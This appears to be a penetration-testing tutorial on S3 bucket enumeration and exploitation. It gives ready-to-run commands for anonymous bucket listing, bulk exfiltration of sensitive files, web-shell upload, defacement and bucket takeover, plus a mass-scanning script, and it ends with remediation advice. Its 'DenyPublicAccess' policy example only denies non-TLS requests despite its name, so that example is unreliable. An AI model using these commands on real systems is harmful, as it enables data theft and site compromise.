S3 Bucket Enumeration and Exploitation

Discovering and exploiting misconfigured Amazon S3 buckets, including enumeration techniques, permission testing, and data exfiltration methods.

Jan 27, 2026
Updated Dec 11, 2025
2 min read

Introduction

Amazon S3 (Simple Storage Service) bucket misconfigurations continue to be a significant source of data exposure in cloud environments. Despite improved defaults and security warnings, organizations may still expose sensitive data through overly permissive bucket policies, ACLs, and public access settings.

This guide covers techniques for discovering S3 buckets, testing their permissions, and exploiting misconfigurations responsibly during security assessments.

S3 Security Model

Access Control Mechanisms

S3 uses multiple overlapping access control mechanisms:

  1. Bucket Policies - JSON policies attached to buckets
  2. ACLs - Legacy access control lists
  3. Block Public Access - Account/bucket level settings
  4. IAM Policies - User/role permissions

Permission Types

| Permission | Effect |
| --- | --- |
| `s3:ListBucket` | List objects in bucket |
| `s3:GetObject` | Download objects |
| `s3:PutObject` | Upload objects |
| `s3:DeleteObject` | Delete objects |
| `s3:GetBucketAcl` | Read bucket ACL |
| `s3:PutBucketPolicy` | Modify bucket policy |
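To illustrate how these permissions combine into a misconfiguration, here is a hypothetical bucket policy (bucket name `example-bucket` is made up) that grants anonymous read and list access — the classic exposure this guide targets:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicRead",
            "Effect": "Allow",
            "Principal": "*",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": [
                "arn:aws:s3:::example-bucket",
                "arn:aws:s3:::example-bucket/*"
            ]
        }
    ]
}
```

With `Principal: "*"`, anyone on the internet — no AWS account required — can list and download every object in the bucket.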

Bucket Discovery Techniques

Name Pattern Enumeration

# Common naming patterns
company-name
company-name-backup
company-name-dev
company-name-prod
company-name-staging
company-name-logs
company-name-assets
company-name-uploads
company-name-data
www.company.com
assets.company.com
backup.company.com
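The pattern list above is easy to generate programmatically. A minimal sketch — the suffix and separator lists are assumptions for illustration, not a standard wordlist:

```python
# Generate candidate S3 bucket names from a base keyword.
# Suffixes and separators below are illustrative assumptions.
SUFFIXES = ["", "backup", "dev", "prod", "staging", "logs",
            "assets", "uploads", "data"]
SEPARATORS = ["-", ".", ""]

def candidates(keyword):
    """Return a sorted list of bucket-name permutations for a keyword."""
    names = set()
    for suffix in SUFFIXES:
        if not suffix:
            names.add(keyword)
            continue
        for sep in SEPARATORS:
            names.add(f"{keyword}{sep}{suffix}")
    return sorted(names)

for name in candidates("company-name"):
    print(name)
```

Feed the output to any of the enumeration tools below as a wordlist.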

Automated Enumeration

# Using S3Scanner
s3scanner --buckets wordlist.txt

# Using bucket-finder
bucket_finder.rb --wordlist wordlist.txt

# Using cloud_enum
cloud_enum -k company -l results.txt

# Using gobuster
gobuster s3 -w wordlist.txt

DNS and Certificate Discovery

# Check CNAME records pointing to S3
dig +short assets.company.com
# Targets like company.s3.amazonaws.com or
# company.s3-website-<region>.amazonaws.com reveal the bucket name

# Certificate Transparency logs
# Search crt.sh for *.s3.amazonaws.com associations

# Google dorking
site:s3.amazonaws.com "company"
site:s3-*.amazonaws.com "company"
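Bucket existence can also be inferred from raw HTTP responses: a GET to `https://<name>.s3.amazonaws.com/` typically returns 404 (`NoSuchBucket`) when the bucket does not exist, 403 (`AccessDenied`) when it exists but denies anonymous listing, 200 when anonymous listing is allowed, and 301 when it lives in another region. A sketch of that interpretation logic plus a stdlib-only probe (the status mapping reflects documented S3 error behavior):

```python
import urllib.request
import urllib.error

def classify_bucket(status_code):
    """Map an HTTP status from GET https://<bucket>.s3.amazonaws.com/
    to a rough access state."""
    if status_code == 404:
        return "nonexistent"           # NoSuchBucket
    if status_code == 403:
        return "exists-private"        # AccessDenied: bucket exists
    if status_code == 200:
        return "exists-listable"       # anonymous ListBucket allowed
    if status_code == 301:
        return "exists-other-region"   # PermanentRedirect
    return "unknown"

def probe(bucket):
    """Issue the probe request and classify the result."""
    url = f"https://{bucket}.s3.amazonaws.com/"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return classify_bucket(resp.status)
    except urllib.error.HTTPError as e:
        return classify_bucket(e.code)
```

A 403 is still a useful finding: the bucket name is confirmed, and authenticated access (next section) may succeed where anonymous access failed.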

Source Code Analysis

# Search repositories for bucket references
grep -r "s3.amazonaws.com" .
grep -r "s3://" .
grep -r "\.s3\." .

# Common files to check
.env
config.js
webpack.config.js
application.properties

Web Application Analysis

# Check page source for S3 URLs
# Look in:
# - Image src attributes
# - JavaScript files
# - CSS background URLs
# - API responses

# Network tab for S3 requests
# Response headers may reveal bucket names

Permission Testing

Anonymous Access Testing

# List bucket contents (anonymous)
aws s3 ls s3://bucket-name --no-sign-request

# Download objects (anonymous)
aws s3 cp s3://bucket-name/file.txt . --no-sign-request

# Check if upload is allowed (anonymous)
echo "test" > test.txt
aws s3 cp test.txt s3://bucket-name/ --no-sign-request

Authenticated Access Testing

# With AWS credentials (any valid AWS account)
aws s3 ls s3://bucket-name
aws s3 cp s3://bucket-name/secret.txt .
aws s3 sync s3://bucket-name ./local-backup

# Check bucket ACL
aws s3api get-bucket-acl --bucket bucket-name

# Check bucket policy
aws s3api get-bucket-policy --bucket bucket-name

# List with versions (if versioning enabled)
aws s3api list-object-versions --bucket bucket-name

Policy Analysis

# Get and analyze bucket policy
aws s3api get-bucket-policy --bucket bucket-name \
    --query Policy --output text | jq .

# Check for dangerous principals:
# - "*" (anyone)
# - "AWS": "*" (any AWS account)
# - Specific account IDs you shouldn't have access to

# Check for dangerous actions:
# - s3:* (full access)
# - s3:GetObject (read all)
# - s3:PutObject (write access)
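The principal and action checks above can be automated once the policy document is in hand. A rough sketch that flags wildcard principals combined with broad actions — the heuristics are illustrative, not an exhaustive audit:

```python
import json

def audit_policy(policy_json):
    """Return findings for obviously dangerous Allow statements in a
    bucket policy document (as returned by get-bucket-policy)."""
    findings = []
    policy = json.loads(policy_json)
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        # "*" or {"AWS": "*"} means anyone / any AWS account
        public = principal == "*" or (
            isinstance(principal, dict) and principal.get("AWS") == "*")
        if public:
            for action in actions:
                if action in ("s3:*", "s3:GetObject", "s3:PutObject"):
                    findings.append(f"public principal allowed {action}")
    return findings
```

Note this ignores `Condition` blocks, which can legitimately restrict an otherwise public statement — treat findings as leads to verify, not conclusions.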

Exploitation Scenarios

Data Exfiltration

# Sync entire bucket
aws s3 sync s3://bucket-name ./loot --no-sign-request

# Download specific file types
aws s3 cp s3://bucket-name/ ./loot \
    --recursive --exclude "*" \
    --include "*.sql" --include "*.bak" --include "*.csv" \
    --no-sign-request

# Search for sensitive files
aws s3 ls s3://bucket-name --recursive | \
    grep -iE '\.(sql|bak|csv|xls|doc|pdf|key|pem|env)$'

Sensitive Data Patterns

# Files to prioritize:
# - Database dumps (.sql, .bak)
# - Configuration files (.env, config.*)
# - Credentials (.pem, .key, credentials)
# - Backups (.zip, .tar.gz)
# - Logs (*.log, access_log)
# - Source code (.git, *.js, *.py)
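Triaging a large recursive listing against these patterns is easily scripted; a small helper whose extension list mirrors the grep shown earlier:

```python
import re

# Extensions worth prioritizing when triaging a bucket listing
SENSITIVE = re.compile(
    r'\.(sql|bak|csv|xls|doc|pdf|key|pem|env|log|zip|tar\.gz)$',
    re.IGNORECASE,
)

def triage(keys):
    """Return only the object keys that match a sensitive pattern."""
    return [k for k in keys if SENSITIVE.search(k)]
```

Pipe the output of `aws s3 ls --recursive` (keys only) into this filter to surface database dumps, keys, and backups first.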

Website Defacement (Write Access)

# If PutObject is allowed
echo "<h1>Security Assessment</h1>" > index.html
aws s3 cp index.html s3://bucket-name/ --no-sign-request

# Upload web shell (for authorized testing only)
aws s3 cp shell.php s3://bucket-name/ --no-sign-request

Bucket Takeover

# If bucket doesn't exist but is referenced
# (e.g., in CNAME record or application code)

# 1. Try to create the bucket
aws s3 mb s3://orphaned-bucket-name

# 2. Host malicious content
echo "<script>alert('subdomain takeover')</script>" > index.html
aws s3 cp index.html s3://orphaned-bucket-name/
aws s3 website s3://orphaned-bucket-name/ --index-document index.html

Versioning Exploitation

# Check if versioning is enabled
aws s3api get-bucket-versioning --bucket bucket-name

# List all versions (may reveal deleted sensitive files)
aws s3api list-object-versions --bucket bucket-name

# Download specific version
aws s3api get-object \
    --bucket bucket-name \
    --key sensitive-file.txt \
    --version-id "version-id-here" \
    ./downloaded-file.txt

# Iterate through deleted objects
aws s3api list-object-versions --bucket bucket-name \
    --query 'DeleteMarkers[].{Key:Key,VersionId:VersionId}'
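The delete-marker output above can be consumed programmatically. A sketch that, given a `list-object-versions` response (the dict shape follows the S3 API; versions are returned newest-first within each key), pairs each currently-deleted key with the most recent real version that can still be downloaded:

```python
def deleted_objects(response):
    """From a list-object-versions response dict, return keys whose
    latest entry is a delete marker, mapped to the newest surviving
    version id that get-object --version-id can still fetch."""
    markers = {m["Key"] for m in response.get("DeleteMarkers", [])
               if m.get("IsLatest")}
    recoverable = {}
    for v in response.get("Versions", []):
        key = v["Key"]
        if key in markers and key not in recoverable:
            # First hit per key is the newest noncurrent version
            recoverable[key] = v["VersionId"]
    return recoverable
```

Each `(key, version_id)` pair it returns plugs directly into the `get-object --version-id` call shown above.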

Tools

S3Scanner

# Enumerate and test buckets
pip install S3Scanner
s3scanner scan --bucket bucket-name
s3scanner dump --bucket bucket-name

AWSBucketDump

# Dump accessible bucket contents
python AWSBucketDump.py -l buckets.txt -g interesting_Keywords.txt

Bucket Finder

# Ruby-based enumeration
./bucket_finder.rb --download bucket-name

Custom Scripts

import boto3
from botocore import UNSIGNED
from botocore.config import Config
from botocore.exceptions import ClientError

# Anonymous client
s3 = boto3.client('s3', config=Config(signature_version=UNSIGNED))

# Test bucket access
def test_bucket(bucket_name):
    try:
        response = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=10)
        print(f"[OPEN] {bucket_name}: {len(response.get('Contents', []))} objects")
        return True
    except ClientError:
        # AccessDenied, NoSuchBucket, etc.
        return False

# Enumerate from wordlist
with open('buckets.txt') as f:
    for bucket in f:
        test_bucket(bucket.strip())

Remediation

Immediate Actions

# Enable Block Public Access (account level)
aws s3control put-public-access-block \
    --account-id YOUR_ACCOUNT_ID \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Enable Block Public Access (bucket level)
aws s3api put-public-access-block \
    --bucket bucket-name \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

Bucket Policy Best Practices

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyPublicAccess",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [
                "arn:aws:s3:::bucket-name",
                "arn:aws:s3:::bucket-name/*"
            ],
            "Condition": {
                "Bool": {
                    "aws:SecureTransport": "false"
                }
            }
        }
    ]
}

Monitoring

# Enable S3 access logging
# Enable CloudTrail for S3 data events
# Set up GuardDuty for anomaly detection
# Use AWS Config rules for compliance
